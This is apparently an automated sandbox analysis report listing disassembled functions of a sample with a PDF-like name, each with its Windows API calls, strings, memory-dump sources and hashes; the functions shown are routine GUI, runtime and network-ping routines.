                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF5A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0078BF6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 641708696-0
                                                                                                                      • Opcode ID: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                                                                                                                      • Instruction ID: 88023b7e3369f7b0aabd978791bccdbc300463d1838439231ea6b1f55058618f
                                                                                                                      • Opcode Fuzzy Hash: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                                                                                                                      • Instruction Fuzzy Hash: 1F619E31102610DFCB35AF14DD48BAAB7F1FF41312F108529E986879A1D7BDA896DF50
                                                                                                                      Function 007521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 007521D3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      • Opcode ID: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
                                                                                                                      • Instruction ID: acdbe4cb752a358f373f4b4e0d497cf7cfb471f672f6dbdf994e5e4485c7ef69
                                                                                                                      • Opcode Fuzzy Hash: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
                                                                                                                      • Instruction Fuzzy Hash: 6641B1351011449BDB215F28EC88BF93B65FB07332F198266FD668A1E2C77A8C47DB61
                                                                                                                      Function 007BAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,007DF910), ref: 007BAB76
                                                                                                                      • GetDriveTypeW.KERNEL32(00000061,0080A620,00000061), ref: 007BAC40
                                                                                                                      • _wcscpy.LIBCMT ref: 007BAC6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                      • Opcode ID: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
                                                                                                                      • Instruction ID: cec151861a0ba080fb8cd52260b8e1b1be3d14175529f5b9dd6243582b70ddae
                                                                                                                      • Opcode Fuzzy Hash: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
                                                                                                                      • Instruction Fuzzy Hash: 6D519D70208301EBC724EF54C895AEBB7A5FF84301F148829F996972E2DB79D949CA53
                                                                                                                      Function 00759997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __i64tow__itow__swprintf
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 421087845-2263619337
                                                                                                                      • Opcode ID: 2097f5fcf790391117d7cb06155288c19c7f622681e6ed9361ad9c0e5b843ab0
                                                                                                                      • Instruction ID: c87137aafa47d02b058b69334f42613ad2e7bf0165c465b4f9537a3f8f9cbe1f
                                                                                                                      • Opcode Fuzzy Hash: 2097f5fcf790391117d7cb06155288c19c7f622681e6ed9361ad9c0e5b843ab0
                                                                                                                      • Instruction Fuzzy Hash: 5C410671614205EFDF24EF38DC46FBA73E8EB44300F20846EEA49D7281EA79A945CB11
                                                                                                                      Function 007D73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007D73D9
                                                                                                                      • CreateMenu.USER32 ref: 007D73F4
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 007D7403
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7490
                                                                                                                      • IsMenu.USER32(?), ref: 007D74A6
                                                                                                                      • CreatePopupMenu.USER32 ref: 007D74B0
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D74DD
                                                                                                                      • DrawMenuBar.USER32 ref: 007D74E5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0$F
                                                                                                                      • API String ID: 176399719-3044882817
                                                                                                                      • Opcode ID: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
                                                                                                                      • Instruction ID: e6c3e20f3f4f589de30df119eb5ac39dff6a05f99dd0b8fcb25ba6c38d6e5d13
                                                                                                                      • Opcode Fuzzy Hash: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
                                                                                                                      • Instruction Fuzzy Hash: D1415874A05245EFDB15DF64E884EDABBB9FF49310F14802AED5697360E738A920CB50
                                                                                                                      Function 007D772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007D77CD
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 007D77D4
                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007D77E7
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 007D77EF
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 007D77FA
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 007D7803
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 007D780D
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007D7821
                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007D782D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                      • Opcode ID: edea286e96a9bb52cf2fe127b5a8adcb3d593d806ae93cca29c8b7afc69ee282
                                                                                                                      • Instruction ID: 005aa33ef87617caa9841338484d45b8d20bb3fd4b2d5ff701976a0a4b6e3ef5
                                                                                                                      • Opcode Fuzzy Hash: edea286e96a9bb52cf2fe127b5a8adcb3d593d806ae93cca29c8b7afc69ee282
                                                                                                                      • Instruction Fuzzy Hash: 8F316D31105219EBDF159FA4DC09FDA3B79FF09321F118226FA16A62A0D739D821DBA4
                                                                                                                      Function 00777040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0077707B
                                                                                                                        • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                                                                                                                      • __gmtime64_s.LIBCMT ref: 00777114
                                                                                                                      • __gmtime64_s.LIBCMT ref: 0077714A
                                                                                                                      • __gmtime64_s.LIBCMT ref: 00777167
                                                                                                                      • __allrem.LIBCMT ref: 007771BD
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007771D9
                                                                                                                      • __allrem.LIBCMT ref: 007771F0
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0077720E
                                                                                                                      • __allrem.LIBCMT ref: 00777225
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00777243
                                                                                                                      • __invoke_watson.LIBCMT ref: 007772B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 384356119-0
                                                                                                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                      • Instruction ID: 8aa4718af0ed251f67180e8f8336bdae3396fbf4bd8ca56ff95dd5874227accb
                                                                                                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                      • Instruction Fuzzy Hash: B671F771A44707EBDB18AE79CC45B6AB3B8BF507A4F14C23AF518D6682E778D900C790
                                                                                                                      Function 007B2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007B2A31
                                                                                                                      • GetMenuItemInfoW.USER32(00816890,000000FF,00000000,00000030), ref: 007B2A92
                                                                                                                      • SetMenuItemInfoW.USER32(00816890,00000004,00000000,00000030), ref: 007B2AC8
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 007B2ADA
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 007B2B1E
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 007B2B3A
                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 007B2B64
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 007B2BA9
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B2BEF
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C03
                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C24
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4176008265-0
                                                                                                                      • Opcode ID: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
                                                                                                                      • Instruction ID: dee3fa73bb35f861feb99633efd6159870cbcdba681b9d9a054c1dc12e681c82
                                                                                                                      • Opcode Fuzzy Hash: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
                                                                                                                      • Instruction Fuzzy Hash: E4619FB0902249AFDB11CF64DC88EFF7BB8EB05304F148559E85297252EB39AD16DB21
                                                                                                                      Function 007D7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D7214
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D7217
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007D723B
                                                                                                                      • _memset.LIBCMT ref: 007D724C
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D725E
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D72D6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                                                                                                                      • Instruction ID: ec9bf24cfd64cb6ec59cabe6ebaff50d952fc938fa7741dd3774c23ed1787713
                                                                                                                      • Opcode Fuzzy Hash: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                                                                                                                      • Instruction Fuzzy Hash: 85616A71900248AFDB10DFA4CC81EEE77B8FF09700F14416AFA55AB3A1E778A955DB60
                                                                                                                      Function 007A710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007A7135
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 007A718E
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007A71A0
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 007A71C0
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 007A7213
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 007A7227
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007A723C
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 007A7249
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A7252
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007A7264
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A726F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                                                                                                                      • Instruction ID: f1d4741962e4b8941472f66d02966a8289bb5606b29c76b24128692c7ba38128
                                                                                                                      • Opcode Fuzzy Hash: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                                                                                                                      • Instruction Fuzzy Hash: 8C413D35900219EFCB04DF64DC48AAEBBB8FF49354F00C169E956A7261CB78A945CFA0
                                                                                                                      Function 007C86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • CoInitialize.OLE32 ref: 007C8718
                                                                                                                      • CoUninitialize.OLE32 ref: 007C8723
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,007E2BEC,?), ref: 007C8783
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 007C87F6
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C8890
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C88F1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: b4da10933a4d71d6991709db0e879f7c87949eaf3267bf39ff9b37ca3481cde9
                                                                                                                      • Instruction ID: 075018921f997d6537d5f103ac39327009e84f8a2c09953b20afe7f128f12d2a
                                                                                                                      • Opcode Fuzzy Hash: b4da10933a4d71d6991709db0e879f7c87949eaf3267bf39ff9b37ca3481cde9
                                                                                                                      • Instruction Fuzzy Hash: C8617870608301EFD750DB64C848F6ABBE8AF89714F14491EF9859B291DB78ED48CB93
                                                                                                                      Function 007C5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 007C5AA6
                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 007C5AEB
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 007C5AF7
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 007C5B05
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B75
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B8B
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C5C00
                                                                                                                      • WSACleanup.WSOCK32 ref: 007C5C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 17ab192e784b64b5d10ad33f0102eda7e3926f6676aa109af67781f106d19ae7
                                                                                                                      • Instruction ID: 1d330fcbf876e61e2b6cc1b9415f9b2071caebc822a2a9e16834419b0e15b793
                                                                                                                      • Opcode Fuzzy Hash: 17ab192e784b64b5d10ad33f0102eda7e3926f6676aa109af67781f106d19ae7
                                                                                                                      • Instruction Fuzzy Hash: CB516A71604701DFDB209F24C849F6ABBE4EB44310F14892EF956DB2A1DB79FC448B55
                                                                                                                      Function 007BB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BB73B
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BB7B1
                                                                                                                      • GetLastError.KERNEL32 ref: 007BB7BB
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 007BB828
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
